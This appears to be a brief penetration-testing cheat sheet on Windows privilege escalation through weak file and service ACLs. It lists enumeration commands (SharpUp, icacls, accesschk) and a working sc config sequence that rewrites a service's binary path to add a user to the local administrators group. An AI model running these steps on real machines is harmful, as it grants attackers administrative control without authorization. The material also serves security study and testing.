View on GitHub

File System ACLs

Weak Permissions - File System ACLs

We can use SharpUp to check for service binaries suffering from weak ACLs.

To verify the ACLs for a specific file: icacls C:\path\to\file

Ideally, you need (I)(F), which means full permissions, e.g. BUILTIN\Users or Everyone:(I)(F)

To check a service's permissions: accesschk.exe /accepteula -quvcw ServiceName

If you have full permissions on a service, then you can add the current user to the administrators localgroup. To do so: [Requires CMD]

  1. sc config ServiceName binpath="cmd /c net localgroup administrators user-name /add"

  2. sc stop ServiceName

  3. sc start ServiceName

  4. Disclaimer: when starting the service you will get an error due to the previous sc config command

Last updated